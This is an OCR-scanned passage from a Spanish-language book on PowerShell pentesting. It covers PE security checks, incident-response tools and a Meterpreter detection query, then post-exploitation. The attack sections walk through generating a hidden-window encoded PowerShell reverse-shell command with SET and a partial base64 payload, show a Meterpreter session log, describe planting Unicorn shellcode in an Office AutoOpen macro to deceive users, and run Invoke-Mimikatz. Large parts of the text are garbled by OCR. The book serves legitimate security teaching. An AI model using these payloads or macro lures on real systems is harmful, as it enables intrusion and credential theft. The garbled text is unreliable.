dónde se encuentra una función que quiere invocar. El mecanismo ASLR intenta cambiar la posición 
exacta en cada ejecución. DEP, Data Execution Prevention, evita que una aplicación se ejecute en 
una zona de memoria no ejecutable. SafeSEH, es un mecanismo que protege de SEH Overflow. 
StrongNaming, permite identificar el binario univocamente, también conocido como unique identity. 
Authenticode permite a los desarrolladores incluir información adicional en los binarios a través 


Capítulo 'owerShell pi ; 
apitulo IIT. PowerShell puro: El arte del pentesting EJ 


del uso de firmas digitale à 
usc de firmas digitales. Además, con éstas se consigue aumentar | 
posibles modificaciones de éste. i l 


a seguridad del binario ante 


Para realizar un cheque i "chi j 

E coo = TN pa ar -= O e puede ejecutar la siguiente instrucción Ger-PESecurin 

eir t ir ni p os " apos que se obtendrá tras esta ejecución son los valores 

iei ed T : 3 requiere evaluar los binarios que se encuentran dentro de un 
| a siguiente instrucción Get-PESecurity -directory «path | 

PS C:\> Get-PESecurity -directory a 


FileName 


ongNaming 


Respuesta ante incidentes 


En este apart: i 
s artado se van £ strar varios ) i 
2 ip | > van a mostrar varios scrip/s o conjuntos de scripts que pueden ser utilizad 
)8 ecopilar 1 mació a "scenari pi : - iei ui 
a pilar información de un escenario tras un incidente. En muchas ocasion ti 1 
zar herramientas para realizar est: i ; r 
s pare ar esta operativa, las cuale i 
vana ativa, las cuales pueden cambiar el entor 
s le ei pi ambiar el entorno, lo cual en un 
1 es algo no recomendado. Estos scripts utilizan PowerShell para realizar | = 
OWer: vara realizar los menos 


cambios posibles en el entorno v reco » à 
! en el entorno y recopilar información fiable de los sistemas epe 
atacada. s sistemas de la organización 


Kansa 


Kansa es un mó Á 
mó cide SPONS i 
dirección URL oon de /ncident Response escrito en PowerShell. Puede ser descargado desde | 
ección bres E wr E E ; "apod ai 
2 y teri https: eithub.com/davehull/Kansa. El modulo se encuentra testeado P Sh i 
v2 y posteriores. / S mes z ei mu m iini 
y posteriores. Aunque funciona mejor a partir de la version 3 de Po Shell — 
j e S É werShell. 


Para hacer funci 

are uncionar correctamente Ka seed ; 

Miei cm arc ectamente Kansa se debe abrir una consola con privilegios de Adminis 

y. posteriormente, ejecutar kansa.ps! AA PRE 
Modules —Verbose. El A i 


de información. 


Target <lo lh otic / unas- -À HZ ITI: 1 
GIHOSL U Otras maquinas 
odule Pe th dica de I K - D E Jara : i p * ( 
e dó ide ansa utilizara los recurso Į ira la reco] il 1 | 
SOS € 


En la carpeta Modi ( 
a carpeta Modules de - : 
le Kansa se puede encontrar gran cantidad de scripts utilizad 
g sc ados para 


reco ilaciór de infi ació 
C ) ormacion referentes ¿ > i i 1 

" D coni gurac > tas inas ` 

it: n; ) ) Ss y lon de las maquinas. procesos, logs disco 


El script de Í i 
ipt deberia recolectar información de la máqui | 
ectar información de la máquina local o remota utilizando Windows R 
$ Aemolre 


Manag : ji ] script error, se ) Mi tar C e els tt € ae 

t t ement. Si eI sce : Í 

i T one l à i da ror, se del eria hal ili ar esta caract rística C uand el crip in liz l 

Sua Sp e deu g i rn O ) a 1 
I recto io den mir ad O t ut timest ir cont da la info macion T col t d 

usu irio dis ne c | di ctor :nomin o uput timestamp o [v ectada. 


BE 
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ES 


. | 3 € c ac de Í E ectoric 
; € ila I ormacio 
Oyeur es un cor junto de sc 1pl util zados I ara re aliz ir reco 101 n acion ae dir 


"v i cor - H j 5 - p tarri t 5 ` "id comi 
active Oveur ha sido escr ito por el investigador espar ol Juan Gar ido, tamb len conoc ^» C ) 
| A! j i Xdig ) € Ser S 25 ire ió 7 ib HIPS: /gunub. com 
Sil "€ rhack El códi o pued se de: ca gado de: de la direcció n U RL de Gi hu hity o 
of 7 . E > 


silverhack/voyeur. 


i e del directorio active. La herramienta 
Voyeur proporciona una manera rápida para generar un reporte del directorio active. La he s 
ramienta es c: ?nerar un reporte e 
está desarrollada completamente en PowerShell. La herramienta es capaz de ces U | I - 
Sei i v ro formato q ade ser utilizado es csv. E 
si ari ¡er rar un reporte vistoso. Otro formato que pued 
Excel, si el usuario quiere lograr un repo FI uo reci 
reporte generado por la herramienta es un punto de entrada para el trabajo de análisis de - az | i 
i ista fi ipo de incident respo 'stigadores de 
en un directorio active, de un analista forense, un equipo de incident response o investige 


seguridad. 


Find-MsfPSExec BEEN 
La función Find-MsfPSExec permite, a través de PowerShell y los MEM vel m 
eventos que identifiquen la ejecución de una Meterpreter en un sistema — ^ - dig at 
de los hechos más encontrados por los equipos de respuesta ante incidentes en brechas de seg 


en empresas. 


disípma- aue tfeneanc ntificador 
La función utiliza Ger-Eventlog para matchear los eventos del sistema que tengan emis em D e 
a au ` € y^ Ee à Ad aaa 
. m " "m no "Ob: > ) ye del Servicio 
el 7045, los cuales informan de la ejecución de un servicio, y empesar Si €i n: m * qi 
iiie SS a "T VOTE AYTO 92279 exe* .Laseg 
comienza por "M" y si la ruta tiene la estructura "*25S YSTE MROOT%)! ?2?????? exe g E 
Kk. > E 


j S 'rpreter a través de la invocación del servicio. 
parte localiza el binario que ha ejecutado esa Meterpreter a través de la invocac 
M J 


Esto no asegura que sea una Meterpreter lo que se ha ejecutado en el sisemi, po — 
han ido aumentando si encajan las 3 comprobaciones. Por desgracia, A s n T : -— que 
hecho en algunas versiones, es decir, se conocía que cuando se T: , ra A - dela 
módulo psexec de Metasploit se creaba un servicio que obiEtUNDR por ; " He — : 
en ASYSTEMROOT%. Hoy día, las versiones más modernas no utilizan la "M" pare 


nombre del servicio. siendo este valor aleatorio. 


igua, y se puedan detectar los Meterpreter 
Es cierto que la versión del módulo de psexec pueda ser antigua, y se puedan detectar | eter] 


i śtodo es ilizc jara llevar a cabo 
ejecutados en una máquina comprometida, ya que este método es muy utilizado pa E E : 
À nien ización cc i :| código de la funció 'de descargarse 
movimientos laterales en una organización comprometida. El código de la función dee nn Ll 
D à /gi lobscuresec/PowerShell/blob/master/Find- MsfPSExec. / 
i ić e / "uresec/PowerShell/blob/m 
desde la dirección URL https://github.com/obscuresec/F 


continuación se muestra el código: 


Message 


A 


Capitulo III. PowerShell puro: El arte del pentesting 


El script puede ser fácilmente modificado para encontr: 
versiones de Metasploit, pero para ello hay 
número de caracteres tope. 


ar o matchear las ejecuciones en las nuevas 
que matchear que el nombre del servicio contiene el 
A continuación se propone una versión reducid 
permitir al pentester o analista realizar su detección (Get-Eventlog -LogName “system” | Where- 
Object ($ .EventID -eq 7045)) | Where-Object !($ . Message -match "Nombre del servicio; M")j. 


La modificación sería cambiar el match por /ike con la longitud de interrogantes equivalente. 


a del script que puede 


El idioma del sistema operativo importa, por lo que si la versión del sistema es otra no inglesa 
se deberá cambiar la función expuesta anteriormente, ya que cuando se ejecuta /($ .Messaee 
-maich "Service Name: M")! no matcheará ningün resultado. 


ya que, por ejemplo, en español 
sería "Nombre de servicio: M" 


A continuación se muestra la modificación del si ript 
ejecutable directamente, para obtener los resultados. (Get-Eve 
Object 1$ .EventID -eq 7045} | Where-Objeet !($ -Message -match "Nombre del Servicio 
Where-Object !($ Message -like "**$5SYSTEA 1ROOT?41???????? 


, el cual ya es 
intlog -LogName "system" 


.exe* ^)/) | Format-List. 


En la imagen se puede visualizar la fecha en la que el evento se generó, el servicio fue lanz 


ado y 
el binario ejecutado. El nombre del serv icio es MgOTGqTDCqaxNJnUodCbHH. 11ZXgKyf. por lo 
que encaja con la posibilidad de que sea una 
%ASYSTEMROOT% ¡DshiyNkp.exe. 


Meterpreter y el nombre del archivo del serv icio es 


PS C:NMindouzNsuzten32» €Get-Eventlog -LogNane '' 


ys 
-natch "Nombre del Servicio: nu) 1 Vhere-Object 


Mhere-Object 4$. .EventID eg 78455 ! Mhere-Object <(5_.Mess 


t gaga 
€ E sage —like "*ZSVSTEMROOTz«?? ???7.exe*' ))) 1 Pornat-List > 


c 
Index : 25715 

EntryType * Information 

I anceld : 1073749869 


Message : Se instaló un servicio en el sistema. 


Nombre del servicio: M4QTGgTDCgaxNJnUodCHHHAIZKgKyf 
chivo del servicio: SYSTEMROOT¿ND=z hi yNkp. exc 
i io de modo usuario 
inicio por solicitud 
st 


Nombre del ; 
Tipo de 
Tipo de inicio 
Cuenta de servicio 
y : «85 
ZategoryNunber : 8 
ReplacementStringe : XHqQTGqTDCqaxNJnUodCbHHATZXgKyf , SYSTEM 
olicitud...) 
s i Control Manager 
815 1 58 


OT/ADshiyNkp.exe, servicio de modo usuario, inicio por 


instaló un servicio en el sistema. 


Nombre del servicio: 

Nombre del i 4SYSTEMROOTZNhKHsUetZ.exe 
Tipo de s io pa o de modo 0 

Tipo de inicio « "Uicio: inicio por solicitud 

Cuenta de zervici LocalSysten 


Fig. 3.53: Detección de Meterpreter con PowerShell. 
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Capítulo IV 
PowerShell y otras herramientas: 
Pentesting sin límites 


1. La post-explotación con PowerShell 


En este capitulo el lector podrá estudiar herramientas externas a PowerShell que se apoyan en la linca 
de comandos de Microsoft para obtener un beneficio, generalmente, en la fase de post-exploitation. 
Hay gran cantidad de herramientas y lenguajes capaces de generar código o instrucciones de 
PowerShell con las que el pentester podrá obtener un beneficio, como se mencionó anteriormente. 


¿Por qué se obtiene un beneficio? En los sistemas Microsofi, desde que la línea de comandos se 
encuentra nativa desde Windows Vista y Windows Server 2008, todas las acciones de recopilación 
de información, obtención de privilegio. ejecución de código, acciones a través de dicha máquina, 
etcétera, pueden realizarse con PowerShell, Por ejemplo, la comunidad de Metasploit se dio cuenta 
de este hecho y han centralizado esfuerzos para sacar el máximo potencial a PowerShell a través de 
las sesiones de Meterpreter. Hoy en día, se puede abrir una PowerShell interactiva a través de un 
payload de Metasploit y aprovechar todo el potencial que en este libro se ha reflejado en el capitulo 
dedicado a los distintos frameworks de PowerShell. Además, se podrán ejecutar los diferentes scripts 
que el pentester pueda desarrollar con la ayuda del presente libro. 


En algunos entornos puede ser útil disponer de una instrucción de tipo EncodedCommand con la que 
ejecutar código en Baseó4 y conseguir ejecutar instrucciones. Esto ya se ha visto en el libro, pero 
existen herramientas escritas en Python, o incluso el propio conjunto de herramientas de ingeniería 
social denominado SET, que permiten crear este tipo de instrucciones. Estas instrucciones son tan 
potentes que un pentester podría llevarlas almacenadas en un /xf y pegarlas directamente sobre la 
PowerShell o ejecutarlas, por ejemplo, a través del payload de PowerShell de Metasploit obtenido a 
través de una explotación de una vulnerabilidad en la fase previa. 


Por último, hacer hincapié en que existen diferentes módulos escritos en PowerShell que integran 
con herramientas como Metasploit y Nessus, como son Posh-Metasploit y Posh-Nessus. En este 
capítulo se hará un recorrido por el módulo de Metasploit y se verá la interacción con el famoso 
framework de explotación. 
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: - : : T 
En muchas ocasiones existen politicas locales o de dominio que evitan que los A " a 
ejecutar una cmd, pero a día de hoy muchos administradores no tienen apr cuenta a la : -— LIÉ 
: * » . e 
: i j : la emd clásica de Windows. Si un usuario ti 
ésta herramienta es aún más potente que l za v— 
fisico a un equipo puede ejecutar cualquier tipo de código a través de una PowerShell, por ejemp 


un Meterpreter. 


Es sabido que PowerShell tiene una serie de políticas de ejecución de scripts, como » se a -m o 
el libro. A modo de resumen, un administrador puede configurar una política restr ait con : q ^ 
usuario no podrá ejecutar scripts a través de PowerShell. Otra opción es unrestricted. con la q 


usuario puede ejecutar cualquier tipo de scrip! en la consola. 


indi j i ript en 
Las opciones allsigned y remotesigned indican que para " ejecutar ementi A 
áqui i $ . mientras que la segunda opción indic 
la máquina se necesita que esté firmado, m a E 
lar localmente pueden ser ejecutados sin necesidad de que estén firmados, pen a" e ^ 
sido creados fuera del equipo deben estar firmados. Para visualizar en una PowerShell la p 
configurada se debe ejecutar el comando Get-ExecutionPolicy. 


Spear-Phishing Attack Vectors 
2) Mebsite Attack Vectors 

3) Infectious Media Generator 

4) Create a Payload and Listener 
5) Mass Mailer Attack 

6) Arduino-Based Attack Vector 
7) SMS Spoofing Attack Vector 

8) Wireless Access Point Attack Vector 
9) QRCode Generator Attack Vector 
Powershell Attack Vectors 

Third Party Modules 


Fig. 4.01: Menú de SET con distintos vectores de ataque. 


; : å à " : Bs ai 
La herramienta SET, Social! Engineering Toolkit, permite realizar diversos > a ha pd 
ingeniería social. Uno de los vectores que muestra es la utilización de PowerShell para llev 


ejecución de código sobre esta consola de Windows. 


El vector de ataque de PowerShell proporciona diversas posibilidades, c - —P 
y i "ipt el cual puede ser ejecutado directam 

en todas. Se puede obtener el código de un scrip! e m — 

y pegando m la PowerShell, por si existe alguna política en la máquina que —Ó € E 

de scripts, o se puede obtener una instrucción que invoca la ejecución de pai en -— v E 

ültimo es realmente interesante, ya que de algün modo ofusca y hace que se pueda ejecu 


de manera menos transparente. 


En el presente ejemplo se va a utilizar la opción PowerShell Alphanumeric Shellcode popa D 
permite crear una instrucción que ejecutará una PowerShell de forma no interactiva y el cod1g 
ejecutar se encontrará encodeado en baseó4. 
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1) Powershell Alphanumeric Shellcode Injector 
2) Powershell Reverse Shell 

3) Powershell Bind Shell 

4) Powershell Dump SAM Database 


Fig. 4.02: Opciones que proporciona SET sobre PowerShell. 


Una vez seleccionado este ataque se solicitará al usuario una serie de parámetros para configurar, los 
cuales se explican a continuación: 


- Dirección IP a la cual, una vez ejecutado el código en la PowerShell, se devolverá el 
control de la máquina víctima. 


- Puerto en el que el atacante estará escuchando y esperando a la ejecución del código. 


- Una vez generada la instrucción, se solicita al usuario si quiere configurar el handler de 


Metasploit para recibir el control de la máquina dónde se ejecute el código generado. 
Set ipoyersherT> 
set» IP address for the payload listener: 192.168.56.103 
set:powershell» Enter the port for the reverse [443]: 
Prepping the payload for delivery and injecting alphanumeric shellcode,.. 
Generating x86-based powershell injection code... 
Finished generating powershell injection bypass. 
Encoded to bypass execution restriction policy... 


If you want the powershell commands and attack, they are exported to /root/, 
set/reports/powershell/ 


set» Do you want to start the listener now [yes/no]: : 
Fig. 4.03: Configuración de Alphanumeric Shellcode Injector. 


Un atacante con acceso físico a un equipo Windows puede introducir en el equipo un fichero £x? con 
la instrucción generada, ya sea porque se lo descarga de Internet o lo tiene almacenado en un medio 
extraible. El atacante tendrá configurado el handler en un equipo remoto que será el que recibirá 


el control, produciéndose la petición desde dentro hacia fuera, por lo que generalmente se evitarán 
temas de firewall. 


En el ejemplo se puede visualizar diversas opciones en la ejecución de PowerShell. A continuación 
se enumeran las opciones y el significado de éstas: 


- nop. Indica que PowerShell será ejecutada sin ningún profile cargado. 
- -windows hidden. Indica que la instrucción será ejecutada en una ventana oculta. 
- -noni. Indica que la consola no será interactiva. 


- -enc. Indica que a continuación viene el código de PowerShell a ejecutar. 
Archivo Edición Formato Ver Ayuda 


powershell -nop -windows hidden -noni -enc 
JAAxACAAPQAgACCAJABjACAAPQAgACCAJWBbAEQAbAB sAEkAbQBWAGBA 
cgB0ACgATgBrAGUAcgBuAGUADAAZADIAL gBkAGWADAAi ACKAXQBwWAHUA 
YgBsAGkAYwAgAHMAdABhAHQAaQB jACAAZQBAAHQAZQByAGAAIABJAGAA 
dABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQB s AGwAbwB 3AC 
Fig. 4.04: Instrucción generada con SET para PowerShell. 
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ió ; : i o acceso 
Cuando el usuario malicioso ejecuta la instrucción en la PowerShell se está I — " 
control remoto de la máquina. Tal y como puede visualizarse en la imagen se ejecuta una : p 


sobre una máquina Windows Server 2012 en este caso. 


msf exploit(handler) > l 
" Started reverse handler on 0.0,0.0:443 
'| Starting the payload handler... 


" i 769024 bytes) to 192.168.56.102 a 
$ wives lego 1 opened (192.168.56.103:443 -> 192.168.56.102:57574) a 


2015-03-13 08:16:56 40100 


exploit(handler) > sessions -i 1 


[*] Starting interaction with 1... 


meterpreter » sysinfo 
> E WIN-GUEBSMLDIEB 
: Windows 2012 (Build 8400). 
: x64 (Current Process is WOW64) 
: es ES 
: x86/win32 


Fig. 4.03: Toma de control en remoto de la máquina con acceso fisico. 


ió j e ti Senicas para de forma 
Lógicamente, cuando hay una intrusión remota se puede ejecutar este tipo de were " — 
posterior tomar el control de la máquina remota. Por ejemplo, en una vulnera ili - — 
Injection en una aplicación web que utilice Windows con PowerShell en el sistema pc jj 


este tipo de instrucciones para lograr una Meferpreter. 


3. PowerShell Shellcode Injection con Python 


i i tester la 
En este apartado se trata una herramienta escrita en Pyt/ion, la cual — - I 
we 5di er, a ejecutar una shellcode en memoria. 3 
ibili código en PowerShell para ejecu en i 
nba i i Ini 2 ite obtener código en lenguaje C para 
i ie nado Unicorn2C, permite o j 
derivado de esta herramienta, denomi 2C, p te rn — 
conseguir crear un binario Windows, el cual enlazará la ejecución de la shellcode y obt gr 
tasa de evasión de antivirus. 
id K |y Josh 
La base de la herramienta Unicorn es el bypass de PowerShell presentado por mo apan S - 
Celly inye irect ia a través de Power. » 
helle ecta directamente en la memoria à Power. 
Kelly en Defcon 18. La shellcode se iny TERR m i 
esto hará m su detección sea compleja. Unicorn puede obtenerse en la siguiente direc 
https://github.com/trustedsec/unicorn. 


El uso de unicorn.py es realmente sencillo, su ejecución es la siguiente python gu ps paa 2n . 
«dirección IP>. Para ejemplificar se puede visualizar la siguiente — I ascen d 
windows/meterpreter/reverse tcp 192.168.56.101. Como puede —— 
Metasploit instalado, ya que el script de Python lo utiliza para genera la : i 
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Tras la ejecución de Unicorn se obtienen 2 ficheros. El primero de los ficheros contiene la instrucción 
de PowerShell que se debe ejecutar en la línea de comandos, por ejemplo copiando y pegando. 


La instrucción generada tiene el siguiente aspecto: 

PowerShell.exe -Window Hidden —EncodedCommand <shellcode encoded>. El segundo archivo 
contiene las instrucciones de Metasploit necesarias para configurar el multi/handler para recibir 
las shellcodes. Este método funcionará en cualquier sistema Windows dónde se encuentre instalado 
PowerShell. 


Los archivos ofimáticos de Office pueden utilizar macros y las instrucciones de PowerShell generadas 
por Unicorn pueden ser utilizadas en estas macros con el fin de que al abrirse un archivo se ejecute 
la macro con el código malicioso. 


Para ello, se puede crear una nueva macro en un archivo ofimático y en el método AutoOpen pegar 
el código generado para PowerShell. Cuando el usuario ejecute el archivo ofimático le saldrá un 
mensaje indicando que el archivo está dañado y automáticamente se cerrará, pero se debe obtener la 
sesión, ya que se habrá ejecutado engafiando al usuario. Esta técnica se denomina el ataque macro 
a través de PowerShell. 


En resumen, se obtiene 2 ficheros, PowerShell attack.txt y unicorn.rc. El archivo de texto contiene 
todo el código necesario para inyectar el ataque en memoria. El segundo archivo contiene la 
configuración del handler, simplemente hay que ejecutarlo, por ejemplo con msfconsole—rc unicorn. 
rc o, dentro de la consola, resource unicorn.rc. 


4. Payloads de PowerShell en Metasploit 


La posibilidad de utilizar PowerShell como Payload en Metasploit abre un nuevo mundo de post- 
exploitation. Generalmente, un pentester podía utilizar una shell o cmd tras una explotación, o en 
el mejor de los casos, una Meterpreter que proporciona gran cantidad de funcionalidades para la 
post-explotación. 


A mediados de 2015 se desarrolló la posibilidad de utilizar un payload de tipo inline que ofrece 
la posibilidad de ejecutar una PowerShell interactiva de tipo bind y de tipo reverse. Juntando este 
payload con los diferentes frameworks de PowerShell que se han visto en este libro se obtiene un 
gran potencial en la fase de post-exploitation, incluso estando a la altura de Meterpreter. 


Hay que tener en cuenta que tener una PowerShell interactiva permite acceder a todos los 
componentes del sistema operativo y productos de Microsoft. Además, permite ejecutar, como se ha 
mencionado anteriormente, todos los scripts que la gente de la comunidad va desarrollando y que se 
encuentran accesible en Github. 


Por supuesto, también el pentester puede desarrollar sus scripts y ejecutarlos a través de dicha 
PowerShell interactiva. 
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Fig. 4.07: Carga de se ripts en la sesión de PowerShell interactiva en Metasploit 


se puede valorar la posibilidad de utilizar un ps1 que cargue todas las funciones. por ejemplo 


del framework PowerSploit o Vishang. En algunos de los frameworks comentados en el libro se 


encuentra este tipo de script, el cual tiene un peso grande ya que contiene todas las funcionalidades 


Una vez realizada la explotación y ejecutado el payload. se pu 


le visualizar en la imagen como se 
muestra la linea Loading Modules. El payload de PowerShell h 


a descargado automáticamente la 
función y la ha importado a la sesión interactiva de PowerShell. En este instante se puede ejecutar la 
función importada automáticamente. tal y como se puede visualizar en la imagen 
La función /nvoke-Mimikatz, en este caso se ha ejecutado a través de la PowerShell Interactiva 
proporciona los resultados en la consola. 
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Console. Este módulo proporciona las funciones necesarias para interactuar c 


servidor de Metasploit como si estuviera utilizando msfconsole. 
- Db. Este módulo proporciona al pentester las funciones necesarias para interactuar con un 
motor de base de datos, tal y como se haría en Metasploit. 

- Jobs. Este módulo proporciona las funciones necesarias para gestionar los trabajos que 


pueden ser utilizados en Metasploit. 
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Module. Este módulo proporciona una gran cantidad de funciones que ayudan a gestionar 


los diferentes módulos con sus diferentes tipos. 

Plugin. Este módulo gestiona los diferentes plugins que pueden ser añadidos al frame ork, 
por ejemplo el plugin de Nessus, Nmap o Nexpose. 
- Posh-Metasploit. Este módulo gestiona las sesiones con el servidor remoto, desde la 
creación de éstas hasta la desconexión y eliminación de la sesión. 

Session. Este módulo proporciona funciones que permiten gestionar éstas, desde su 
enumeración hasta la interacción. 
- Variables. Este módulo proporciona funciones para gestionar las variables globales del 
framework y almacenar la configuración. 


, 
Console 

El módulo console presenta todas las funciones necesarias para interactuar con la consola de 
Metasploit en remoto. Quien ha utilizado la consola de Me tasploit se hace una idea de todo lo que 


se puede realizar con ella, pero generalmente lo que aportarán las funciones de PowerShell con e 


módulo es la posibilidad de interactuar con la consola como si se estuviera delante de ella. Para 
interactuar con la consola se debe tener una sesión con el servidor creada previamente. El módulo 
consta de 6 funciones, las cuales como se mencionó anteriormente permiten la gestión e interacción 


con la consola de Metasploit. A continuación se describen brevemente las funciones: 


Función Descripción 


—Ü Esta función enumera las consolas que se encuentran activas poi 
Get-MSF Console 
parte del usuario sobre el servidor de Metasploit 


Esta función crea una nueva consola sobre el servidor de Metasploit 


Vew-MSFConsole Para crear una nueva consola de puede utilizar New-MSF Consoli 


Id <identificador sesión: 


Esta función elimina una consola abierta en el sers idor de | 


Metasploit. Para eliminar una consola se puede ejecutar Remove- 


Remove-MSF Consol ic ds RE à : : Lm : 
USFConsole —Id <identificador sesión? -Consoleld identificador 


consola que se obtiene al crearlas 


— 


Esta función permite escribir texto a través de la sesión de consola 


; NN Un ejemplo sería Write-MSFConsole fd - identificador sesión 
Write- MSF Console 5 p i 


-Consoleld <identificador consola> -Text “comando”. Puede 


resultar interesante enviar **n" después del texto 


Esta función permite ejecutar comandos a través de una consola 


fuso remota. Para lograr esto se ejecuta /nvoke-MSFConsoleCommand 
Hvoke- " 


MSFConsoleCommand 


Id <identificador sesión? -Consoleld <identificador consola 
-Command “comando ”. Para poder leer la salida de la ejecución del 
comando se debe utilizar la función Read-MSFConsole 
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i i sali j ión de un comando. 
Esta función permite leer la salida de una ejecución pem. 
Read-MSF Console Un ejemplo sería Read-MSFConsole —Id <identificador sesión? 
== -Consoleld <identificador consola> 


Tabla 4.01: Funciones de Console en Posh-Metasploit. 


r , - TS 

En el sitio web de Posh-Metasploit se pueden encontrar diversos ejemplos sobre la ejecució 
estas funciones sobre un entorno real de Metasploit. 

i j i trabajos en 
En la imagen se puede visualizar como se invoca el comando Jobs ge puns id - a Fu 

ici i tado el usuario en dicha sesión. Para p 

background o servicios que tiene mon ^n 
Invoke-MSFConsoleCommand se hace uso de la función Read-MSF Console. 


Fig. 4.09: Ejemplo de ejecución de comandos a través de Invoke- MSFConsoleCommand. 
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i ii ploi e datos 
Este módulo proporciona funciones que permiten la gestión de n -— -— 
que tenga configurada en el servidor. Esto puede ser útil para almacenar información, po 
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tras realizar un escaneo con algün módulo o plugin de Metasploit. A continuación se describen las 


funciones de este módulo: 
[Few | Descripción 
Esta función permite crear un nuevo host en la base de datos, si 


Set-MSFDBHost éste no se encuentra presente. Por ejemplo, Se-MSFDBHost —Id 


<identificador sesión? -IPAddress «dirección IP host 
Get-MSFDBHost 
Remove-MSFDBHost 
Get-MSFDBServcie 


Set-MSFDBServcie 


Esta función devuelve un listado de los hosts que se encuentran en 

la base de datos de Metasploit 

Esta función permite eliminar uno o varios hosts de la base de 
datos de Metasploit 

Esta función permite obtener un listado de servicios de la base de 

datos de Metasploit 


Esta función permite afiadir un nuevo servicio a la base de 

datos de Metasploit. Un ejemplo sería Set- MSFDBService ld 
<identificador sesión? -Port «puerto servicio -Protocol TCP 
IPAddress «dirección IP servicio» -State «estado, por ejemplo 
Open? 


Esta función permite eliminar un servicio de la base de datos de 


Remove-MSFDBServcie Metasploit 


Esta función permite añadir una nueva vulnerabilidad en la base 
de datos de Metasploit. Un ejemplo sería Set-MSFDBVuln -Id 
<identificador sesión? -Port «puerto de producto, por ejemplo 
22» -Protocol TCP -Name “Nombre vulnerabilidad, por ejemplo 
SSH Vuln” —IPAddress «dirección IP del RHOST> -References 

“CVE, BID, OSVDB, etcétera> 


Esta función devuelve un listado con las vulnerabilidades 
que se encuentran en la base de datos de Metasploit. Estas 
vulnerabilidades pueden haberse añadido gracias a otra 
herramienta y la importación de sus datos, como por ejemplo 

Nessus 


Remove-MSFDBViln Esta función permite eliminar una vulnerabilidad de la base de 
datos de Metasploit 
Esta función devuelve un listado de las notas que se hayan añadido 
Get-MSFDBNote a la base de datos de Metasploit 
Set-MSFDBNote Esta función permite añadir o modificar una nota en la base de 
datos de Metasploit 
Remove-MSFDBNote Esta función permite eliminar una nota de la base de datos de 
Metasploit 


Set-MSEDBVuln 


Get-MSFDB Vuln 
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Esta función devuelve un listado de eventos registrados en la 
sesión de Metasploit. Es decir, cada vez que el usuario ejecuta un 
; comando, una consola se inicia, etcétera, se registra un evento. 
Get-MSFDBEvent n -— e 
Con esta función se pueden visualizar los distintos eventos de la 
sesión. Un ejemplo sería Ger-MSFDBEvent -id <identificador 
sesión? -Limit «registros a consultar? 
Esta función permite afiadir una credencial a la base de datos de 
Metasploit. Un ejemplo sería Set-MSFDBCred -ld <identificador 
sesión? -Port «puerto? -Username «nombre usuario? -Password 


Set-MSFDBCred 
<contraseña> -Type Password —IPAddress «dirección IP host> 


Get-MSFDBCred Esta función devuelve un listado de credenciales recopiladas en la 
base de datos de Metasploit 
Esta función devuelve un listado de los Zoot recopilados en la base 
CORSA de datos de Metasploit 
Get-MSFDBStatus Esta función devuelve el estado de la base de datos. La 
información interesante aquí es el driver configurado 


Esta función realiza la conexión a la base de datos. La instrucción 
para llevar a cabo la conexión es Connec!-MSFDB —DBHost 
«dirección IP host DB» -DatabaseName «nombre DB> 
-Credentiales (Get-Credential msf) 


Disconnect-MSFDB Esta función realiza la desconexión de la base de datos 
Get-MSFDBWorspace Esta función devuelve el listado de workspaces 


Esta función devuelve el listado actual de workspaces sobre el que 
MSFDBCurrentWorspace Metasploit se està ejecutando 
Set-MSFDBWorkspace 


Esta función permite importar información de escaneos con otras 
herramientas a la base de datos de Metasploit. Un ejemplo sería 
Import-MSFDBData -ld <identificador sesión? -File «report. 

nessus> 


Connect-MSFDB 


Import-MSFDBData 


Tabla 4.02: Funciones de Db en Posh-Metasploit. 


Jobs 


Este módulo proporciona al pentester las funciones necesarias para gestionar trabajos o Jobs que 
Metasploit lanza por debajo. Por ejemplo, cuando se lanza un módulo de tipo exploit con interacción 
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el usuario, se suele lanzar un servicio que espera las peticiones del usuario, esto sería un Job. A 
continuación se describen las funciones que gestionan los Jobs en Metasploit: uH 


Get-MSFJob 


Descripción 


Esta función devuelve un listado de los Jobs que se encuentran 
ejecutando en la sesión de Metasploit. Un ejemplo seria Get-MSFJob -Id 
<identificador sesión 
Esta función devuelve un listado de los Jobs que se encuentran ejecutando 
en la sesión de Metasploit. Como añadido la información que se devuelve 
son todos los valores que se encuentran configurados en el Datastore de 
dicho job 
Esta función elimina un job que se encuentra ejecutando en Metasploit 


Tabla 4.03: Funciones de Jobs en Posh-Metasploit. 


Get- MSFJoblnfo 


Remove-MSFJob 


En la imagen se puede visualizar un ejemplo de recuperación de Jobs de Me 
que se obtiene. Es importante ver la información recuperada del Datastore 
la configuración del módulo concreto. 


tasploit y la información 
dónde se puede visualizar 


Fig. 4.10: Recuperación de información de los job que ejecutan en Metasploit 


Module 


Este módulo proporciona diferentes funciones que permiten gestionar e interactu 
módulos de Metasploit. Estas funciones ayudan a configurar ciertos módulos y 
través de la sesión como si el usuario estuviera conectado a la consola, l 


ar con los diferentes 
poder ejecutarlos a 


A continuación se describen las diferentes funciones con algunos ejemplos: 


Descripción 
Esta función proporciona un listado de estadísticas sobre 
el número de módulos de cada tipo que se encuentra 


disponible en la versión de Metasploit. Un ejemplo sería 
Get-MSF ModuleStats -Id <identificador sesión? 


Get-MSFModuleStats 
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Esta función recarga todos los módulos de Metasploit, 
Invoke-MSFModuleReload actualizando el nümero de módulos si alguno hubiera sido 
añadido desde la última carga. Un ejemplo sería /nvoke- 
MSFModuleReload -Id <identificador sesión? 


Esta función recupera todos los módulos de tipo Auxiliary 
que hay cargados en Metasploit. Un ejemplo para 
recuperar módulos que hagan fuerza bruta al login podría 
ser Get-MSFAuxiliaryModule -Id <identificador sesión? | 
where [$ .name -like "*login*"] 


Get-MSFPostModule Esta función recupera todos los módulos de tipo Post que 
se encuentran cargados en Metasploit 
Get-MSFExploitModule Esta función recupera todos los módulos de tipo Exploit 
que se encuentran cargados en Metasploit 
Get-MSFPayloadModule Esta función recupera todos los módulos de tipo Payload 
que se encuentran cargados en Metasploit 
Get-MSFNOPS Esta función recupera todos los módulos de tipo Nops que 
se encuentran cargados en Metasploit 


Esta función devuelve información sobre un módulo 
concreto que debe ser indicado a través de los argumentos 


Name y Type. Un ejemplo sería Get-MSFModulelnfo -Id 
<identificador sesión» -Name multi/handler -Type exploit 


Esta función devuelve información sobre los módulos de 
tipo payload que son compatibles con un módulo de tipo 
exploit en concreto. Un ejemplo de esta funcionalidad 
sería Get-MSFExploitCompatiblePayload -Id 
<identificador sesión? -Name windows/smb/psexec 


Get-MSFAuxiliaryModule 


Get-MSF Modulelnfo 


Gel- 


MSFExploitCompatiblePavload 


